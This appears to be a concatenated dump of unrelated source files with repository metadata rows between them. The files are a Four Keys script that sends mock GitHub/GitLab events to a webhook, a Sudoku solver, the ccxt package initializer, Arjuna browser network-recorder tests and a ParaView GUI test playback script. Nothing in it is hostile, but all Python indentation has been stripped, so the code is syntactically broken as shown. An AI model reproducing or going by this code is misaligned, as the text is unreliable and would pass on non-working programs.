|
g-loot/fourkeys
|
a42ccbe17742e6db958d6c7936d46886f75bb540
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
import hmac
import json
import os
import random
import secrets
import time
import sys
from hashlib import sha1
from urllib.request import Request, urlopen
def make_changes(num_changes, vcs, event_timespan):
changes = []
max_time = time.time() - event_timespan
head_commit = None
event = None
for x in range(num_changes):
change_id = secrets.token_hex(20)
unix_timestamp = time.time() - random.randrange(0, event_timespan)
change = {
"id": change_id,
"timestamp": datetime.datetime.fromtimestamp(unix_timestamp),
}
if unix_timestamp > max_time:
max_time = unix_timestamp
head_commit = change
changes.append(change)
if vcs == "gitlab":
event = {
"object_kind": "push",
"checkout_sha": head_commit["id"],
"commits": changes,
}
if vcs == "github":
event = {"head_commit": head_commit, "commits": changes}
return event
def create_github_deploy_event(change):
deployment = {
"deployment_status": {
"updated_at": change["timestamp"],
"id": secrets.token_hex(20),
"state": "success",
},
"deployment": {
"sha": change["id"],
},
}
return deployment
def create_gitlab_pipeline_event(changes):
pipeline = None
checkout_sha = changes["checkout_sha"]
for c in changes["commits"]:
if c["id"] == checkout_sha:
pipeline = {
"object_kind": "pipeline",
"object_attributes": {
"created_at": c["timestamp"],
"id": random.randrange(0, 1000),
"status": "success",
},
"commit": c,
}
return pipeline
def create_gitlab_deploy_event(changes):
deployment = None
checkout_sha = changes["checkout_sha"]
for c in changes["commits"]:
if c["id"] == checkout_sha:
deployment = {
"object_kind": "deployment",
"status": "success",
"status_changed_at": c["timestamp"].strftime("%F %T +0200"),
"deployment_id": random.randrange(0, 1000),
"commit_url": f"http://example.com/root/test/commit/{checkout_sha}",
}
return deployment
def make_github_issue(root_cause):
event = {
"issue": {
"created_at": root_cause["timestamp"],
"updated_at": datetime.datetime.now(),
"closed_at": datetime.datetime.now(),
"number": random.randrange(0, 1000),
"labels": [{"name": "Incident"}],
"body": "root cause: %s" % root_cause["id"],
},
"repository": {"name": "foobar"},
}
return event
def make_gitlab_issue(changes):
issue = None
checkout_sha = changes["checkout_sha"]
for c in changes["commits"]:
if c["id"] == checkout_sha:
issue = {
"object_kind": "issue",
"object_attributes": {
"created_at": c["timestamp"],
"updated_at": datetime.datetime.now(),
"closed_at": datetime.datetime.now(),
"id": random.randrange(0, 1000),
"labels": [{"title": "Incident"}],
"description": "root cause: %s" % c["id"],
},
}
return issue
def make_webhook_request(vcs, webhook_url, secret, event_type, data, token=None):
data = json.dumps(data, default=str).encode()
request = Request(webhook_url, data)
if vcs == "github":
signature = hmac.new(secret.encode(), data, sha1)
request.add_header("X-Github-Event", event_type)
request.add_header("X-Hub-Signature", "sha1=" + signature.hexdigest())
request.add_header("User-Agent", "GitHub-Hookshot/mock")
if vcs == "gitlab":
request.add_header("X-Gitlab-Event", event_type)
request.add_header("X-Gitlab-Token", secret)
request.add_header("Content-Type", "application/json")
request.add_header("Mock", True)
if token:
request.add_header("Authorization", f"Bearer {token}")
return request
def post_to_webhook(vcs, webhook_url, secret, event_type, data, token=None):
request = make_webhook_request(vcs, webhook_url, secret, event_type, data, token)
response = urlopen(request)
if response.getcode() == 204:
return 1
else:
return 0
if __name__ == "__main__":
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument(
"--event_timespan",
"-t",
type=int,
default=604800,
help="time duration (in seconds) of timestamps of generated events \
(from [Now-timespan] to [Now]); default=604800 (1 week)",
)
parser.add_argument(
"--num_events",
"-e",
type=int,
default=20,
help="number of events to generate; default=20",
)
parser.add_argument(
"--num_issues",
"-i",
type=int,
default=2,
help="number of issues to generate; default=2",
)
parser.add_argument(
"--vc_system",
"-v",
required=True,
choices=["gitlab", "github"],
help="version control system (e.g. 'github', 'gitlab')",
)
args = parser.parse_args()
if args.num_issues > args.num_events:
print("Error: num_issues cannot be greater than num_events")
sys.exit()
# get environment vars
webhook_url = os.environ.get("WEBHOOK")
secret = os.environ.get("SECRET")
token = os.environ.get("TOKEN")
if not webhook_url or not secret:
print(
"Error: please ensure the following environment variables are set: WEBHOOK, SECRET"
)
sys.exit()
all_changesets = []
changes_sent = 0
for x in range(args.num_events):
# make a change set containing a random number of changes
changeset = make_changes(
random.randrange(1, 5),
args.vc_system,
args.event_timespan,
)
# Send individual changes data
for c in changeset["commits"]:
curr_change = None
if args.vc_system == "gitlab":
curr_change = {
"object_kind": "push",
"checkout_sha": c["id"],
"commits": [c],
}
if args.vc_system == "github":
curr_change = {"head_commit": c, "commits": [c]}
changes_sent += post_to_webhook(
args.vc_system, webhook_url, secret, "push", curr_change, token
)
# Send fully associated push event
post_to_webhook(args.vc_system, webhook_url, secret, "push", changeset, token)
# Make and send a deployment
if args.vc_system == "gitlab":
deploy = create_gitlab_deploy_event(changeset)
post_to_webhook(
args.vc_system, webhook_url, secret, "deployment", deploy, token
)
if args.vc_system == "github":
deploy = create_github_deploy_event(changeset["head_commit"])
post_to_webhook(
args.vc_system, webhook_url, secret, "deployment_status", deploy, token
)
all_changesets.append(changeset)
# randomly create incidents associated to changes
changesets_with_issues = random.sample(all_changesets, args.num_issues)
for changeset in changesets_with_issues:
issue = None
if args.vc_system == "gitlab":
issue = make_gitlab_issue(changeset)
if args.vc_system == "github":
issue = make_github_issue(changeset["head_commit"])
post_to_webhook(args.vc_system, webhook_url, secret, "issues", issue, token)
print(f"{changes_sent} changes successfully sent to event-handler")
| 30.785714
| 95
| 0.581323
|
0d5113d881ff0c9c457e7eaf3b8c4e4293d25828
| 6,381
|
py
|
Python
|
Sudoku_Solver.py
|
sameer-m-dev/sudoku-solver
|
b7f8fec5d705ebddace7bac9970bbefa5f4da5ef
|
[
"Apache-2.0"
] | null | null | null |
Sudoku_Solver.py
|
sameer-m-dev/sudoku-solver
|
b7f8fec5d705ebddace7bac9970bbefa5f4da5ef
|
[
"Apache-2.0"
] | null | null | null |
Sudoku_Solver.py
|
sameer-m-dev/sudoku-solver
|
b7f8fec5d705ebddace7bac9970bbefa5f4da5ef
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[139]:
#naming rows and columns
rows = 'ABCDEFGHI'
cols = '123456789'
# In[140]:
def cross(a, b):
return [s+t for s in a for t in b]
# In[142]:
#creating out sudoku box
boxes = cross(rows, cols)
# In[143]:
row_units = [cross(r, cols) for r in rows]
# Element example:
# row_units[0] = ['A1', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9']
# This is the top most row.
column_units = [cross(rows, c) for c in cols]
# Element example:
# column_units[0] = ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1', 'H1', 'I1']
# This is the left most column.
square_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]
# Element example:
# square_units[0] = ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']
# This is the top left square.
unitlist = row_units + column_units + square_units
units = dict((s, [u for u in unitlist if s in u]) for s in boxes)
peers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)
# In[146]:
def display(values):
"""
Display the values as a 2-D grid.
Input: The sudoku in dictionary form
Output: None
"""
width = 1+max(len(values[s]) for s in boxes)
line = '+'.join(['-'*(width*3)]*3)
for r in rows:
print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
# In[152]:
def grid_values_old(grid):
"""Convert grid string into {<box>: <value>} dict with '.' value for empties.
Args:
grid: Sudoku grid in string form, 81 characters long
Returns:
Sudoku grid in dictionary form:
- keys: Box labels, e.g. 'A1'
- values: Value in corresponding box, e.g. '8', or '.' if it is empty.
"""
assert len(grid) == 81, "Input grid must be a string of length 81 (9x9)"
return dict(zip(boxes, grid))
# In[217]:
grid = '4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'
grid2 = '..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..'
grid3= '8..........36......7..9.2...5...7.......457.....1...3...1....68..85...1..9....4..' #worlds hardest sudoku
# In[220]:
display(grid_values_old(grid))
# In[221]:
def grid_values(grid):
"""Convert grid string into {<box>: <value>} dict with '123456789' value for empties.
Args:
grid: Sudoku grid in string form, 81 characters long
Returns:
Sudoku grid in dictionary form:
- keys: Box labels, e.g. 'A1'
- values: Value in corresponding box, e.g. '8', or '123456789' if it is empty.
"""
values = []
all_digits = '123456789'
for c in grid:
if c == '.':
values.append(all_digits)
elif c in all_digits:
values.append(c)
assert len(values) == 81
return dict(zip(boxes, values))
# In[222]:
display(grid_values(grid))
# In[196]:
def eliminate(values):
"""Eliminate values from peers of each box with a single value.
Go through all the boxes, and whenever there is a box with a single value,
eliminate this value from the set of values of all its peers.
Args:
values: Sudoku in dictionary form.
Returns:
Resulting Sudoku in dictionary form after eliminating values.
"""
solved_values = [box for box in values.keys() if len(values[box]) == 1]
for box in solved_values:
digit = values[box]
for peer in peers[box]:
values[peer] = values[peer].replace(digit,'')
return values
# In[197]:
display(eliminate(grid_values(grid)))
# In[223]:
def only_choice(values):
"""Finalize all values that are the only choice for a unit.
Go through all the units, and whenever there is a unit with a value
that only fits in one box, assign the value to this box.
Input: Sudoku in dictionary form.
Output: Resulting Sudoku in dictionary form after filling in only choices.
"""
for unit in unitlist:
for digit in '123456789':
dplaces = [box for box in unit if digit in values[box]]
if len(dplaces) == 1:
values[dplaces[0]] = digit
return values
# In[224]:
display(only_choice(eliminate(grid_values(grid))))
# In[203]:
def reduce_puzzle(values):
"""
Iterate eliminate() and only_choice(). If at some point, there is a box with no available values, return False.
If the sudoku is solved, return the sudoku.
If after an iteration of both functions, the sudoku remains the same, return the sudoku.
Input: A sudoku in dictionary form.
Output: The resulting sudoku in dictionary form.
"""
stalled = False
while not stalled:
# Check how many boxes have a determined value
solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])
# Use the Eliminate Strategy
values = eliminate(values)
# Use the Only Choice Strategy
values = only_choice(values)
# Check how many boxes have a determined value, to compare
solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])
# If no new values were added, stop the loop.
stalled = solved_values_before == solved_values_after
# Sanity check, return False if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return False
return values
# In[215]:
display(reduce_puzzle(grid_values(grid2)))
# In[209]:
def search(values):
"Using depth-first search and propagation, try all possible values."
# First, reduce the puzzle using the previous function
values = reduce_puzzle(values)
if values is False:
return False ## Failed earlier
if all(len(values[s]) == 1 for s in boxes):
return values ## Solved!
# Choose one of the unfilled squares with the fewest possibilities
n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)
# return n,s
# Now use recurrence to solve each one of the resulting sudokus, and
for value in values[s]:
new_sudoku = values.copy()
new_sudoku[s] = value
attempt = search(new_sudoku)
if attempt:
return attempt
# In[218]:
display(search(grid_values(grid3)))
# In[ ]:
| 25.422311
| 115
| 0.605704
|
ff976151eea1c82e7516ee20a423f237a8e96ad8
| 14,242
|
py
|
Python
|
python/ccxt/__init__.py
|
ibrahiamm/ccxt
|
9b1d68c58709d568d65399ce2084f731ff530fd0
|
[
"MIT"
] | null | null | null |
python/ccxt/__init__.py
|
ibrahiamm/ccxt
|
9b1d68c58709d568d65399ce2084f731ff530fd0
|
[
"MIT"
] | null | null | null |
python/ccxt/__init__.py
|
ibrahiamm/ccxt
|
9b1d68c58709d568d65399ce2084f731ff530fd0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""CCXT: CryptoCurrency eXchange Trading Library"""
# MIT License
# Copyright (c) 2017 Igor Kroitor
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ----------------------------------------------------------------------------
__version__ = '1.64.44'
# ----------------------------------------------------------------------------
from ccxt.base.exchange import Exchange # noqa: F401
from ccxt.base.precise import Precise # noqa: F401
from ccxt.base.decimal_to_precision import decimal_to_precision # noqa: F401
from ccxt.base.decimal_to_precision import TRUNCATE # noqa: F401
from ccxt.base.decimal_to_precision import ROUND # noqa: F401
from ccxt.base.decimal_to_precision import DECIMAL_PLACES # noqa: F401
from ccxt.base.decimal_to_precision import SIGNIFICANT_DIGITS # noqa: F401
from ccxt.base.decimal_to_precision import TICK_SIZE # noqa: F401
from ccxt.base.decimal_to_precision import NO_PADDING # noqa: F401
from ccxt.base.decimal_to_precision import PAD_WITH_ZERO # noqa: F401
from ccxt.base import errors
from ccxt.base.errors import BaseError # noqa: F401
from ccxt.base.errors import ExchangeError # noqa: F401
from ccxt.base.errors import AuthenticationError # noqa: F401
from ccxt.base.errors import PermissionDenied # noqa: F401
from ccxt.base.errors import AccountSuspended # noqa: F401
from ccxt.base.errors import ArgumentsRequired # noqa: F401
from ccxt.base.errors import BadRequest # noqa: F401
from ccxt.base.errors import BadSymbol # noqa: F401
from ccxt.base.errors import BadResponse # noqa: F401
from ccxt.base.errors import NullResponse # noqa: F401
from ccxt.base.errors import InsufficientFunds # noqa: F401
from ccxt.base.errors import InvalidAddress # noqa: F401
from ccxt.base.errors import AddressPending # noqa: F401
from ccxt.base.errors import InvalidOrder # noqa: F401
from ccxt.base.errors import OrderNotFound # noqa: F401
from ccxt.base.errors import OrderNotCached # noqa: F401
from ccxt.base.errors import CancelPending # noqa: F401
from ccxt.base.errors import OrderImmediatelyFillable # noqa: F401
from ccxt.base.errors import OrderNotFillable # noqa: F401
from ccxt.base.errors import DuplicateOrderId # noqa: F401
from ccxt.base.errors import NotSupported # noqa: F401
from ccxt.base.errors import NetworkError # noqa: F401
from ccxt.base.errors import DDoSProtection # noqa: F401
from ccxt.base.errors import RateLimitExceeded # noqa: F401
from ccxt.base.errors import ExchangeNotAvailable # noqa: F401
from ccxt.base.errors import OnMaintenance # noqa: F401
from ccxt.base.errors import InvalidNonce # noqa: F401
from ccxt.base.errors import RequestTimeout # noqa: F401
from ccxt.base.errors import error_hierarchy # noqa: F401
from ccxt.aax import aax # noqa: F401
from ccxt.ascendex import ascendex # noqa: F401
from ccxt.bequant import bequant # noqa: F401
from ccxt.bibox import bibox # noqa: F401
from ccxt.bigone import bigone # noqa: F401
from ccxt.binance import binance # noqa: F401
from ccxt.binancecoinm import binancecoinm # noqa: F401
from ccxt.binanceus import binanceus # noqa: F401
from ccxt.binanceusdm import binanceusdm # noqa: F401
from ccxt.bit2c import bit2c # noqa: F401
from ccxt.bitbank import bitbank # noqa: F401
from ccxt.bitbay import bitbay # noqa: F401
from ccxt.bitbns import bitbns # noqa: F401
from ccxt.bitcoincom import bitcoincom # noqa: F401
from ccxt.bitfinex import bitfinex # noqa: F401
from ccxt.bitfinex2 import bitfinex2 # noqa: F401
from ccxt.bitflyer import bitflyer # noqa: F401
from ccxt.bitforex import bitforex # noqa: F401
from ccxt.bitget import bitget # noqa: F401
from ccxt.bithumb import bithumb # noqa: F401
from ccxt.bitmart import bitmart # noqa: F401
from ccxt.bitmex import bitmex # noqa: F401
from ccxt.bitpanda import bitpanda # noqa: F401
from ccxt.bitrue import bitrue # noqa: F401
from ccxt.bitso import bitso # noqa: F401
from ccxt.bitstamp import bitstamp # noqa: F401
from ccxt.bitstamp1 import bitstamp1 # noqa: F401
from ccxt.bittrex import bittrex # noqa: F401
from ccxt.bitvavo import bitvavo # noqa: F401
from ccxt.bl3p import bl3p # noqa: F401
from ccxt.btcalpha import btcalpha # noqa: F401
from ccxt.btcbox import btcbox # noqa: F401
from ccxt.btcmarkets import btcmarkets # noqa: F401
from ccxt.btctradeua import btctradeua # noqa: F401
from ccxt.btcturk import btcturk # noqa: F401
from ccxt.buda import buda # noqa: F401
from ccxt.bw import bw # noqa: F401
from ccxt.bybit import bybit # noqa: F401
from ccxt.bytetrade import bytetrade # noqa: F401
from ccxt.cdax import cdax # noqa: F401
from ccxt.cex import cex # noqa: F401
from ccxt.coinbase import coinbase # noqa: F401
from ccxt.coinbaseprime import coinbaseprime # noqa: F401
from ccxt.coinbasepro import coinbasepro # noqa: F401
from ccxt.coincheck import coincheck # noqa: F401
from ccxt.coinex import coinex # noqa: F401
from ccxt.coinfalcon import coinfalcon # noqa: F401
from ccxt.coinmate import coinmate # noqa: F401
from ccxt.coinone import coinone # noqa: F401
from ccxt.coinspot import coinspot # noqa: F401
from ccxt.crex24 import crex24 # noqa: F401
from ccxt.currencycom import currencycom # noqa: F401
from ccxt.delta import delta # noqa: F401
from ccxt.deribit import deribit # noqa: F401
from ccxt.digifinex import digifinex # noqa: F401
from ccxt.eqonex import eqonex # noqa: F401
from ccxt.equos import equos # noqa: F401
from ccxt.exmo import exmo # noqa: F401
from ccxt.flowbtc import flowbtc # noqa: F401
from ccxt.ftx import ftx # noqa: F401
from ccxt.ftxus import ftxus # noqa: F401
from ccxt.gateio import gateio # noqa: F401
from ccxt.gemini import gemini # noqa: F401
from ccxt.hitbtc import hitbtc # noqa: F401
from ccxt.hitbtc3 import hitbtc3 # noqa: F401
from ccxt.hollaex import hollaex # noqa: F401
from ccxt.huobi import huobi # noqa: F401
from ccxt.huobijp import huobijp # noqa: F401
from ccxt.huobipro import huobipro # noqa: F401
from ccxt.idex import idex # noqa: F401
from ccxt.independentreserve import independentreserve # noqa: F401
from ccxt.indodax import indodax # noqa: F401
from ccxt.itbit import itbit # noqa: F401
from ccxt.kraken import kraken # noqa: F401
from ccxt.kucoin import kucoin # noqa: F401
from ccxt.kuna import kuna # noqa: F401
from ccxt.latoken import latoken # noqa: F401
from ccxt.latoken1 import latoken1 # noqa: F401
from ccxt.lbank import lbank # noqa: F401
from ccxt.liquid import liquid # noqa: F401
from ccxt.luno import luno # noqa: F401
from ccxt.lykke import lykke # noqa: F401
from ccxt.mercado import mercado # noqa: F401
from ccxt.mexc import mexc # noqa: F401
from ccxt.ndax import ndax # noqa: F401
from ccxt.novadax import novadax # noqa: F401
from ccxt.oceanex import oceanex # noqa: F401
from ccxt.okcoin import okcoin # noqa: F401
from ccxt.okex import okex # noqa: F401
from ccxt.okex3 import okex3 # noqa: F401
from ccxt.okex5 import okex5 # noqa: F401
from ccxt.paymium import paymium # noqa: F401
from ccxt.phemex import phemex # noqa: F401
from ccxt.poloniex import poloniex # noqa: F401
from ccxt.probit import probit # noqa: F401
from ccxt.qtrade import qtrade # noqa: F401
from ccxt.ripio import ripio # noqa: F401
from ccxt.stex import stex # noqa: F401
from ccxt.therock import therock # noqa: F401
from ccxt.tidebit import tidebit # noqa: F401
from ccxt.tidex import tidex # noqa: F401
from ccxt.timex import timex # noqa: F401
from ccxt.upbit import upbit # noqa: F401
from ccxt.vcc import vcc # noqa: F401
from ccxt.wavesexchange import wavesexchange # noqa: F401
from ccxt.whitebit import whitebit # noqa: F401
from ccxt.xena import xena # noqa: F401
from ccxt.yobit import yobit # noqa: F401
from ccxt.zaif import zaif # noqa: F401
from ccxt.zb import zb # noqa: F401
from ccxt.zipmex import zipmex # noqa: F401
from ccxt.zonda import zonda # noqa: F401
exchanges = [
'aax',
'ascendex',
'bequant',
'bibox',
'bigone',
'binance',
'binancecoinm',
'binanceus',
'binanceusdm',
'bit2c',
'bitbank',
'bitbay',
'bitbns',
'bitcoincom',
'bitfinex',
'bitfinex2',
'bitflyer',
'bitforex',
'bitget',
'bithumb',
'bitmart',
'bitmex',
'bitpanda',
'bitrue',
'bitso',
'bitstamp',
'bitstamp1',
'bittrex',
'bitvavo',
'bl3p',
'btcalpha',
'btcbox',
'btcmarkets',
'btctradeua',
'btcturk',
'buda',
'bw',
'bybit',
'bytetrade',
'cdax',
'cex',
'coinbase',
'coinbaseprime',
'coinbasepro',
'coincheck',
'coinex',
'coinfalcon',
'coinmate',
'coinone',
'coinspot',
'crex24',
'currencycom',
'delta',
'deribit',
'digifinex',
'eqonex',
'equos',
'exmo',
'flowbtc',
'ftx',
'ftxus',
'gateio',
'gemini',
'hitbtc',
'hitbtc3',
'hollaex',
'huobi',
'huobijp',
'huobipro',
'idex',
'independentreserve',
'indodax',
'itbit',
'kraken',
'kucoin',
'kuna',
'latoken',
'latoken1',
'lbank',
'liquid',
'luno',
'lykke',
'mercado',
'mexc',
'ndax',
'novadax',
'oceanex',
'okcoin',
'okex',
'okex3',
'okex5',
'paymium',
'phemex',
'poloniex',
'probit',
'qtrade',
'ripio',
'stex',
'therock',
'tidebit',
'tidex',
'timex',
'upbit',
'vcc',
'wavesexchange',
'whitebit',
'xena',
'yobit',
'zaif',
'zb',
'zipmex',
'zonda',
]
base = [
'Exchange',
'Precise',
'exchanges',
'decimal_to_precision',
]
__all__ = base + errors.__all__ + exchanges
| 46.24026
| 80
| 0.534195
|
aed561fd5fb0c0ddb881baad61795fc30f83347d
| 2,213
|
py
|
Python
|
arjuna-samples/arjex/test/pkg/reporting/check_rep_01_selenium_network.py
|
StefanIGit/arjuna
|
6c7d9099e0d766e7b30936ef25d32c1414133b96
|
[
"Apache-2.0"
] | 13
|
2020-05-12T06:32:51.000Z
|
2022-01-24T18:21:19.000Z
|
arjuna-samples/arjex/test/pkg/reporting/check_rep_01_selenium_network.py
|
StefanIGit/arjuna
|
6c7d9099e0d766e7b30936ef25d32c1414133b96
|
[
"Apache-2.0"
] | 5
|
2020-02-14T12:51:07.000Z
|
2021-12-01T10:39:51.000Z
|
arjuna-samples/arjex/test/pkg/reporting/check_rep_01_selenium_network.py
|
StefanIGit/arjuna
|
6c7d9099e0d766e7b30936ef25d32c1414133b96
|
[
"Apache-2.0"
] | 25
|
2020-01-16T10:44:25.000Z
|
2022-02-24T13:22:22.000Z
|
# This file is a part of Arjuna
# Copyright 2015-2021 Rahul Verma
# Website: www.RahulVerma.net
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from arjuna import *
'''
Try with the following switches to see different behaviors:
-ao browser.network.recorder.enabled true
-ao report.network.always true
'''
def __activity(config=None):
browser = GuiApp(url="https://google.com", config=config)
browser.launch()
browser.network_recorder.record("Test Mile")
browser.go_to_url("http://testmile.com")
browser.network_recorder.register()
browser.quit()
@test
def check_explicit_capture_rec_off_auto_off_pass(request):
# Recording Disabled. Auto recording is off. Filter is on. Inclusion for passed is off.
# Test passes, no network packets in report.
__activity()
@test
def check_explicit_capture_rec_off_auto_off_fail(request):
# Recording Disabled. Auto recording is off. Filter is on. Inclusion for passed is off.
# Test fails, no network packets in report.
__activity()
1/0
@test
def check_explicit_capture_auto_on_pass(request):
# Recording Disabled. Auto recording is on. Filter is on. Inclusion for passed is off.
# Test passes, no network packets in report.
cb = request.config.builder
cb["browser.network.recorder.automatic"] = True
config = cb.register()
__activity(config)
@test
def check_explicit_capture_auto_on_fail(request):
# Recording Disabled. Auto recording is on. Filter is on. Inclusion for passed is off.
# Test fails, no network packets in report.
cb = request.config.builder
cb["browser.network.recorder.automatic"] = True
config = cb.register()
__activity(config)
1/0
| 33.530303
| 91
| 0.735201
|
0b80bf402388f0c0172ca3fb067f7038c3261d38
| 5,113
|
py
|
Python
|
Applications/ParaView/Testing/Python/SaveAnimationMultiView.py
|
UV-CDAT/ParaView
|
095ac28404a85fd86676491b8952884805842223
|
[
"Apache-2.0"
] | null | null | null |
Applications/ParaView/Testing/Python/SaveAnimationMultiView.py
|
UV-CDAT/ParaView
|
095ac28404a85fd86676491b8952884805842223
|
[
"Apache-2.0"
] | null | null | null |
Applications/ParaView/Testing/Python/SaveAnimationMultiView.py
|
UV-CDAT/ParaView
|
095ac28404a85fd86676491b8952884805842223
|
[
"Apache-2.0"
] | null | null | null |
#/usr/bin/env python
import QtTesting
import QtTestingImage
import time
object1 = 'pqClientMainWindow/menubar/menuSources'
QtTesting.playCommand(object1, 'activate', 'Wavelet')
object2 = 'pqClientMainWindow/objectInspectorDock/objectInspector/Accept'
QtTesting.playCommand(object2, 'activate', '')
object6 = 'pqClientMainWindow/1QTabBar1'
QtTesting.playCommand(object6, 'set_tab_with_text', 'Display')
object24 = 'pqClientMainWindow/displayDock/displayWidgetFrame/displayScrollArea/qt_scrollarea_viewport/displayWidget/pqDisplayProxyEditor/StyleGroup/StyleRepresentation/comboBox'
QtTesting.playCommand(object24, 'set_string', 'Surface')
object25 = 'pqClientMainWindow/displayDock/displayWidgetFrame/displayScrollArea/qt_scrollarea_viewport/displayWidget/pqDisplayProxyEditor/ColorGroup/ColorBy/Variables'
QtTesting.playCommand(object25, 'set_string', 'RTData')
QtTesting.playCommand(object6, 'set_tab_with_text', 'Properties')
object3 = 'pqClientMainWindow/centralwidget/MultiViewWidget/CoreWidget/qt_tabwidget_stackedwidget/MultiViewWidget1/Frame.0/SplitHorizontal'
QtTesting.playCommand(object3, 'activate', '')
QtTesting.playCommand(object1, 'activate', 'Arrow')
QtTesting.playCommand(object2, 'activate', '')
object4 = 'pqClientMainWindow/objectInspectorDock/objectInspector/Delete'
QtTesting.playCommand(object4, 'activate', '')
object4 = 'pqClientMainWindow/centralwidget/MultiViewWidget/CoreWidget/qt_tabwidget_stackedwidget/MultiViewWidget1/Splitter.0/Frame.2/SplitVertical'
QtTesting.playCommand(object4, 'activate', '')
QtTesting.playCommand(object1, 'activate', 'Sphere')
QtTesting.playCommand(object2, 'activate', '')
QtTesting.playCommand(object6, 'set_tab_with_text', 'Display')
object8 = 'pqClientMainWindow/displayDock/displayWidgetFrame/displayScrollArea/qt_scrollarea_viewport/displayWidget/Form/ViewGroup/ViewData'
QtTesting.playCommand(object8, 'set_boolean', 'false')
QtTesting.playCommand(object8, 'set_boolean', 'false')
QtTesting.playCommand(object8, 'set_boolean', 'false')
QtTesting.playCommand(object8, 'set_boolean', 'false')
object9 = 'pqClientMainWindow/menubar/menu_File'
QtTesting.playCommand(object9, 'activate', 'actionFileOpen')
QtTesting.playCommand(object6, 'set_tab_with_text', 'Properties')
object10 = 'pqClientMainWindow/FileOpenDialog'
QtTesting.playCommand(object10, 'filesSelected', '$PARAVIEW_DATA_ROOT/Data/dualSphereAnimation.pvd')
QtTesting.playCommand(object2, 'activate', '')
object11 = 'pqClientMainWindow/menubar/menuView'
QtTesting.playCommand(object11, 'activate', 'Animation View')
object15 = 'pqClientMainWindow/pipelineBrowserDock/pipelineBrowser'
QtTesting.playCommand(object15, 'currentChanged', '/0/1|0')
#object12 = 'pqClientMainWindow/animationPanelDock/1pqAnimationPanel0/scrollArea/qt_scrollarea_viewport/AnimationPanel/tracksGroup/propertyName'
#object14 = 'pqClientMainWindow/animationPanelDock/1pqAnimationPanel0/scrollArea/qt_scrollarea_viewport/AnimationPanel/keyFramePropertiesGroup/addKeyFrame'
#QtTesting.playCommand(object12, 'set_string', 'End Theta')
#QtTesting.playCommand(object14, 'activate', '')
object12 = 'pqClientMainWindow/animationViewDock/animationView/pqAnimationWidget/CreateDeleteWidget/PropertyCombo'
QtTesting.playCommand(object12, 'set_string', 'End Theta')
object10 = "pqClientMainWindow/animationViewDock/animationView/1pqAnimationWidget0/1QHeaderView0"
QtTesting.playCommand(object10, "mousePress", "1,1,0,0,0,2")
QtTesting.playCommand(object10, "mouseRelease", "1,1,0,0,0,2")
QtTesting.playCommand(object15, 'currentChanged', '/0/0|0')
QtTesting.playCommand(object10, "mousePress", "1,1,0,0,0,3")
QtTesting.playCommand(object10, "mouseRelease", "1,1,0,0,0,3")
object17 = 'pqClientMainWindow/VCRToolbar/1QToolButton0'
QtTesting.playCommand(object17, 'activate', '')
object18 = 'pqClientMainWindow/VCRToolbar/1QToolButton3'
#object19 = 'pqClientMainWindow/animationPanelDock/1pqAnimationPanel0/scrollArea/qt_scrollarea_viewport/AnimationPanel/keyFramePropertiesGroup/editorFrame/SignalAdaptorKeyFrameValue/lineEdit'
#QtTesting.playCommand(object19, 'set_string', '10')
#QtTesting.playCommand(object19, 'set_string', '10')
object20 = 'pqClientMainWindow/VCRToolbar/1QToolButton1'
QtTesting.playCommand(object11, 'activate', 'Animation View')
QtTesting.playCommand(object11, 'activate', 'Object Inspector')
QtTesting.playCommand(object11, 'activate', 'Pipeline Browser')
QtTesting.playCommand(object9, 'activate', 'actionFileSaveAnimation')
object21 = 'Dialog/spinBoxWidth'
QtTesting.playCommand(object21, 'set_int', '800')
object22 = 'Dialog/spinBoxHeight'
QtTesting.playCommand(object22, 'set_int', '800')
object22 = 'Dialog/okButton'
QtTesting.playCommand(object22, 'activate', '')
